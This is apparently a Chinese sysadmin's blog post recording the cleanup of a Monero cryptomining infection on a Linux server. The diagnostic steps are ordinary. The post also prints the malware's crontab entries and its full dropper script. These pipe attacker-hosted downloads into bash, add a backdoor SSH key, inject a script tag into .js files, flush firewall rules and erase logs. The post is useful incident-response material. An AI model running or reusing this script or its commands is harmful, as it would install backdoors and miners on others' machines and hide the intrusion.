zigw 和 nanoWatch, libudev.so 和 XMR 挖礦程式查殺記錄 XMR惡意挖礦指令碼處理筆記
阿新 • • 發佈:2018-11-27
最近這兩天以來,伺服器一致聲音很響。本來以為有同事在執行大的程式,結果後來發現持續很長時間都是這樣,並沒有停的樣子。後來查了一下,發現有幾個可疑程序導致,幹掉之後,果然伺服器靜悄悄了。
但是,問題並沒有結束,過了一會兒,伺服器又開始轟鳴了,查找了一下,這裡簡單記錄一下。
1.檢視top結果,可見如下情況:
top - 13:38:41 up 7 days, 4:33, 4 users, load average: 80.62, 78.60, 77.78 Tasks: 469 total, 1 running, 465 sleeping, 0 stopped, 3 zombie%Cpu(s): 99.9 us, 0.1 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st KiB Mem : 24.4/65756948 [|||||||||||||||||||||||| ] KiB Swap: 0.0/24367100 [ ] PID USER PR NI VIRT RES SHR S%CPU %MEM TIME+ COMMAND 19214 root 20 0 2016184 75664 1416 S 1958 0.1 5606:28 zigw19369 root 20 0 2016184 55096 1416 S 1951 0.1 5457:32 zigw 29272 root 20 0 294996 62716 4 S 71.2 0.1 126506:29 nanoWatch 2558 root 20 0 21.2g 533096 18008 S 9.9 0.8 0:18.52 java 8830 root 20 0 23.4g 6.1g 18404 S 2.9 9.8 699:47.69 java 25111 root 20 0 23.0g 2.3g 18480 S 0.6 3.6 8:20.14 java 10 root 20 0 0 0 0 S 0.3 0.0 5:07.89 rcu_sched 1315 root 20 0 26812 2308 1504 S 0.3 0.0 1:28.42 systemd-logind 3295 root 20 0 159304 6104 4736 S 0.3 0.0 0:00.10 sshd 3411 root 20 0 162264 2668 1588 R 0.3 0.0 0:00.19 top 3524 root 20 0 1396 868 148 S 0.3 0.0 0:00.01 zlqcduxya 3530 root 20 0 1396 864 148 S 0.3 0.0 0:00.01 ckrdxxjp 9231 root 20 0 24.4g 1.1g 17916 S 0.3 1.8 658:50.70 java 25248 root 20 0 22.2g 935460 13720 S 0.3 1.4 5:00.42 java 41265 mysql 20 0 1975792 398624 8316 S 0.3 0.6 4:00.93 mysqld
通過上圖,可以看到其中存在3個使用率高的,還有3個殭屍程序。
而這裡的 3 zombie ,這三個 zombie就是殭屍程序。
殺掉殭屍程序的辦法:
//先檢視具體程序 #ps -A -o stat,ppid,pid,cmd |grep -e "^[Zz]" //殺死z程序(這些動作略危險,在生產環境的伺服器注意一下) #kill -9 pid號
[[email protected] bin]# ps -A -o stat,ppid,pid,cmd |grep -e "^[Zz]" Zs 22039 22042 [sh] <defunct> 您在 /var/spool/mail/root 中有新郵件 [[email protected] bin]# pwdx 22039 22042 22039: / 22042: 沒有那個程序
當然,
假若你的z程序比較多,可以編寫個小小的指令碼,下面是參與網上的
#ps -A -o stat,ppid,pid,cmd | grep -e '^[Zz]' | awk '{print $2}' | xargs kill -9
查詢crontab,並修改清除定時任務
[[email protected] ~]# cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */3 * * * * root /etc/cron.hourly/gcc.sh
crontab -e 看到的內容:
REDIS0006þ^@^@^[email protected] */5 * * * * wget -O .cmd http://c.21-2n.com:43768/shz.sh && bash .cmd ^@^[email protected] */7 * * * * wget -q -O- https://master.minerxmr.ru/start.jpg | bash ^@^[email protected] */5 * * * * curl -fsSL https://master.minerxmr.ru/start.jpg | bash ^@^EBack3? */13 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh ^@^EBack1= * * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh ÿª^K&à[§9^\ "/tmp/crontab.w3M9PL" [noeol][converted] 11L, 406C
檢視/etc/shz.sh 檔案都在做什麼
病毒特徵
第二種病毒是門羅幣(XMR)挖礦程式,門羅幣似乎是今年年初漲得很快,所以用病毒入侵挖礦的手法也就出現了,病毒主要是通過下載指令碼,執行後下載並啟動挖礦程式來工作,指令碼的內容如下,關於指令碼的程式碼分析見於:XMR惡意挖礦案例簡析,裡面講的非常詳細。
# cat /etc/shz.sh #!/bin/sh setenforce 0 2>dev/null echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null sync && echo 3 >/proc/sys/vm/drop_caches crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/gmbpr2 rtdir="/etc/gmbpr2" oddir="/etc/gmbpr" bbdir="/usr/bin/curl" bbdira="/usr/bin/url" ccdir="/usr/bin/wget" ccdira="/usr/bin/get" mv /usr/bin/wget /usr/bin/get mv /usr/bin/curl /usr/bin/url if [ -f "$oddir" ] then pkill zjgw chattr -i /etc/shz.sh rm -f /etc/shz.sh chattr -i /tmp/shz.sh rm -f /tmp/shz.sh chattr -i /etc/gmbpr rm -f /etc/gmbpr else echo "ok" fi if [ -f "$rtdir" ] then echo "goto 1" >> /etc/gmbpr2 grep -q "46j2h" /etc/config.json if [ $? -eq 0 ]; then echo "config ok" else chattr -i /etc/config.json rm -f /etc/config.json fi chattr -i $cont if [ -f "$bbdir" ] then [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir} else [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir} fi [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/ [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 root/.ssh/authorized_keys [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd [email protected]_me" >> /root/.ssh/authorized_keys ps -fe|grep zigw |grep -v grep if [ $? -ne 0 ] then cd /etc outip=`url icanhazip.com` ip=`echo ${outip//./o}` if [ -z "$ip" ]; then outip=`curl icanhazip.com` ip=`echo ${outip//./o}` fi if [ -z "$ip" ]; then ip="unknow" fi filesize=`ls -l zigw | awk '{ print $5 }'` cfg="/etc/config.json" file="/etc/zigw" if [ -f "$cfg" ] then echo "exists config" else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/config.json > /etc/config.json elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/config.json > /etc/config.json elif [ -f "$ccdir" ] then wget --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/config.json elif [ -f "$ccdira" ] then get --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/config.json fi fi if [ -f "$file" ] then if [ "$filesize" -ne "1467080" ] then chattr -i /etc/zigw rm -f zigw if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /etc/zigw elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /etc/zigw elif [ -f "$ccdir" ] then wget --timeout=10 --tries=100 -P /etc http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw elif [ -f "$ccdira" ] then get --timeout=10 --tries=100 -P /etc http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw fi fi else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /etc/zigw elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /etc/zigw elif [ -f "$ccdir" ] then wget --timeout=10 --tries=100 -P /etc http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw elif [ -f "$ccdira" ] then get --timeout=10 --tries=100 -P /etc http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw fi fi chmod 777 zigw sed -i "s/unknow/${ip}/g" config.json sleep 5s ./zigw else echo "runing....." fi chmod 777 /etc/zigw chattr +i /etc/zigw chmod 777 /etc/shz.sh chattr +i /etc/shz.sh shdir='/etc/shz.sh' if [ -f "$shdir" ] then echo "exists shell" else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /etc/shz.sh elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /etc/shz.sh elif [ -f "$ccdir" ] then wget --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/shz.sh elif [ -f "$ccdira" ] then get --timeout=10 --tries=100 -P /etc http://140.143.35.89:43768/shz.sh fi sh /etc/shz.sh fi else echo "goto 1" > /tmp/gmbpr2 chattr -i $cont [[ $cont =~ "shz.sh" ]] || echo "* * * * * sh /tmp/shz.sh >/dev/null 2>&1" >> ${crondir} ps -fe|grep zigw |grep -v grep if [ $? -ne 0 ] then cd /tmp outip=`url icanhazip.com` ip=`echo ${outip//./o}` if [ -z "$ip" ]; then outip=`curl icanhazip.com` ip=`echo ${outip//./o}` fi if [ -z "$ip" ]; then ip="unknow" fi filesize=`ls -l zigw | awk '{ print $5 }'` cfg="/tmp/config.json" file="/tmp/zigw" if [ -f "$cfg" ] then echo "exists config" else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/config.json > /tmp/config.json elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/config.json > /tmp/config.json elif [ -f "$ccdir" ] then wget --timeout=10 --tries=100 -P /tmp http://140.143.35.89:43768/config.json elif [ -f "$ccdira" ] then get --timeout=10 --tries=100 -P /tmp http://140.143.35.89:43768/config.json fi fi if [ -f "$file" ] then if [ "$filesize" -ne "1467080" ] then chattr -i /tmp/zigw rm -f zigw if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /tmp/zigw elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /tmp/zigw elif [ -f "$ccdir" ] then wget --timeout=10 --tries=100 -P /tmp http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw elif [ -f "$ccdira" ] then get --timeout=10 --tries=100 -P /tmp http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw fi fi else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /tmp/zigw elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 100 http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw > /tmp/zigw elif [ -f "$ccdir" ] then wget --timeout=10 --tries=100 -P /tmp http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw elif [ -f "$ccdira" ] then get --timeout=10 --tries=100 -P /tmp http://zjgw-1256891197.cos.ap-beijing.myqcloud.com/zigw fi fi chmod 777 zigw sed -i "s/unknow/${ip}/g" config.json sleep 5s ./zigw else echo "runing....." fi chmod 777 /tmp/zigw chattr +i /tmp/zigw chmod 777 /tmp/shz.sh chattr +i /tmp/shz.sh shdir='/tmp/shz.sh' if [ -f "$shdir" ] then echo "exists shell" else if [ -f "$bbdir" ] then curl --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /tmp/shz.sh elif [ -f "$bbdira" ] then url --connect-timeout 10 --retry 100 http://140.143.35.89:43768/shz.sh > /tmp/shz.sh elif [ -f "$ccdir" ] then wget --timeout=10 --tries=100 -P /tmp http://140.143.35.89:43768/shz.sh elif [ -f "$ccdira" ] then get --timeout=10 --tries=100 -P /tmp http://140.143.35.89:43768/shz.sh fi sh /tmp/shz.sh fi fi iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP service iptables reload ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\; history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history
注意這兩個地址:
http://c.21-2n.com:43768 http://t.cn/EvlonFh
再查了一下,看V2EX上有人在4小時之前,也遇到這個問題了。(參考:https://www.v2ex.com/t/511857)
檢查 /root/.ssh/authorized_keys ,看有沒有一些奇怪的公鑰:
[[email protected] ~]# cat /root/.ssh/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd [email protected]_me ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd [email protected]_me
參考:https://www.cnblogs.com/Rebybyx/p/9913779.html
檢視/usr/bin下的檔案:
[[email protected] bin]# cat fntmpqdsjxky.sh #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin cp "/usr/bin/fntmpqdsjxky" "/usr/bin/dhgeytmsrf" "/usr/bin/dhgeytmsrf"
檢視/tmp
[[email protected] tmp]# ls -la 總用量 448 drwxrwxrwt. 16 root root 4096 11月 27 15:15 . dr-xr-xr-x. 17 root root 4096 11月 20 09:06 .. drwx------ 2 root root 19 11月 23 09:46 .esd-0 drwxrwxrwt. 2 root root 6 10月 21 18:16 .font-unix drwxr-xr-x 2 root root 88 11月 27 14:00 hsperfdata_root drwxrwxrwt. 2 root root 78 11月 23 09:46 .ICE-unix -rwxrwxrwx 1 root root 448500 11月 23 20:35 nanoWatch drwxr-xr-x 4 root root 52 11月 1 15:03 NGINX drwxr-xr-x 3 root root 24 11月 27 15:15 soft drwx------ 3 root root 16 11月 14 18:57 systemd-private-608487cde1ba4c3aaf4c6aaa08e00275-mariadb.service-QeGg1y drwx------ 3 root root 16 11月 20 09:05 systemd-private-c0fb9c6305d7414cbabf5c6cabc16150-chronyd.service-5PnKzn drwx------ 3 root root 16 11月 23 09:46 systemd-private-c0fb9c6305d7414cbabf5c6cabc16150-colord.service-EwMvPf drwx------ 3 root root 16 11月 20 09:05 systemd-private-c0fb9c6305d7414cbabf5c6cabc16150-cups.service-WvZk2h drwxrwxrwt. 2 root root 6 10月 21 18:16 .Test-unix drwx------ 2 root root 6 11月 15 19:22 tracker-extract-files.0 drwxrwxrwt. 2 root root 6 11月 23 09:51 .X11-unix drwxrwxrwt. 2 root root 6 10月 21 18:16 .XIM-unix
檢視 /var/spool/mail/root
[[email protected] bin]# cat /var/spool/mail/root From [email protected] Tue Nov 27 14:40:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id 6708B1F004E; Tue, 27 Nov 2018 14:40:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> wget -O .cmd http://c.21-2n.com:43768/shz.sh && bash .cmd Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7520> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <20181127064001[email protected]> Date: Tue, 27 Nov 2018 14:40:01 +0800 (CST) /bin/sh: wget: command not found From [email protected] Tue Nov 27 14:40:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id 675F897CA9; Tue, 27 Nov 2018 14:40:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> curl -fsSL https://master.minerxmr.ru/start.jpg | bash Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7519> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <20181127064001[email protected]> Date: Tue, 27 Nov 2018 14:40:01 +0800 (CST) /bin/sh: curl: command not found From [email protected] Tue Nov 27 14:40:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id 6A2A297CA9; Tue, 27 Nov 2018 14:40:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7521> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <20181127064001[email protected]> Date: Tue, 27 Nov 2018 14:40:01 +0800 (CST) /bin/sh: curl: command not found From [email protected] Tue Nov 27 14:41:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id 74A7F97CA9; Tue, 27 Nov 2018 14:41:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7523> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <20181127064101[email protected]> Date: Tue, 27 Nov 2018 14:41:01 +0800 (CST) /bin/sh: curl: command not found From [email protected] Tue Nov 27 14:42:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id 814EF1F0063; Tue, 27 Nov 2018 14:42:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7526> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <20181127064201[email protected]> Date: Tue, 27 Nov 2018 14:42:01 +0800 (CST) /bin/sh: curl: command not found From [email protected] Tue Nov 27 14:42:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id 81BF11F0064; Tue, 27 Nov 2018 14:42:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> wget -q -O- https://master.minerxmr.ru/start.jpg | bash Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7524> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <20181127064201[email protected]> Date: Tue, 27 Nov 2018 14:42:01 +0800 (CST) /bin/sh: wget: command not found From [email protected] Tue Nov 27 14:43:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id 8DF5C1F0064; Tue, 27 Nov 2018 14:43:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7527> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <20181127064301[email protected]> Date: Tue, 27 Nov 2018 14:43:01 +0800 (CST) /bin/sh: curl: command not found From [email protected] Tue Nov 27 14:44:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id 9A9681F0064; Tue, 27 Nov 2018 14:44:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> curl -fsSL http://c.21-2n.com:43768/shz.sh | sh Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7528> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/root> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=root> X-Cron-Env: <USER=root> Message-Id: <20181127064401[email protected]> Date: Tue, 27 Nov 2018 14:44:01 +0800 (CST) /bin/sh: curl: command not found From [email protected] Tue Nov 27 14:45:01 2018 Return-Path: <[email protected]> X-Original-To: root Delivered-To: [email protected] Received: by localhost.localdomain (Postfix, from userid 0) id A6C171F0064; Tue, 27 Nov 2018 14:45:01 +0800 (CST) From: "(Cron Daemon)" <[email protected]> To: [email protected] Subject: Cron <[email protected]> /etc/cron.hourly/gcc.sh Content-Type: text/plain; charset=UTF-8 Auto-Submitted: auto-generated Precedence: bulk X-Cron-Env: <XDG_SESSION_ID=7529> X-Cron-Env: <XDG_RUNTIME_DIR=/run/user/0> X-Cron-Env: <LANG=en_US.UTF-8> X-Cron-Env: <SHELL=/bin/bash>